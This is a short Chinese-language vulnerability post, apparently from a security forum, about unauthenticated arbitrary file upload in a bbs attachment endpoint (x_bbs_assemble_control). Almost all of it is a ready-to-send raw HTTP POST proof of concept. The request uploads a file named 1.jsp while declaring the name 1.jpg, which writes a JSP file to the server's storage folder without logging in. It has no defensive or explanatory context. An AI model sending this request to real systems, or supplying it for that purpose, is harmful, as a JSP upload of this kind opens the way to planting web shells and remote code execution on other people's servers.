未授权任意文件上传,可以在不登录情况下直接往bbs下面存储文件夹写文件
[Shell] 纯文本查看 复制代码
POST /x_bbs_assemble_control/jaxrs/attachment/upload/subject/161ccc21-3178-4e21-9b6f-5d36aed65ecb HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1435424574173394427053965142
Content-Length: 467
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
SL-CE-SUID: 21
-----------------------------1435424574173394427053965142
Content-Disposition: form-data; name="site"
161ccc21-3178-4e21-9b6f-5d36aed65ecb
-----------------------------1435424574173394427053965142
Content-Disposition: form-data; name="file"; filename="1.jsp"
123
-----------------------------1435424574173394427053965142
Content-Disposition: form-data; name="fileName"
1.jpg
-----------------------------1435424574173394427053965142--
|